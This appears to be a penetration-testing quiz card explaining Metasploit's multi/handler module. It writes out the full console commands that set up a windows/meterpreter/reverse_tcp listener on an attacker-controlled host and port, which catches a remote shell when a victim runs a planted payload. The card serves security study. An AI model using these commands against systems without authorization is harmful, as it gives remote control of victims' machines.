Quiz Entry - updated: 2026.07.01
What does use exploit/multi/handler do in Metasploit, and how is it paired with a payload?
It starts the attacker-side listener that waits for a planted payload to connect back.
multi/handler is a generic catcher for any standalone payload. You configure it to match exactly the payload you planted:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
set LPORT 444
run
run prints "Started reverse TCP handler on …" and blocks, waiting. The moment the victim executes the malicious file, it dials LHOST:LPORT, the handler answers, and a Meterpreter session opens. The LHOST/LPORT here must be identical to what the payload was built with — otherwise the callback goes nowhere.
Tip: The handler is just the "phone" the attacker leaves off the hook so the victim's call connects.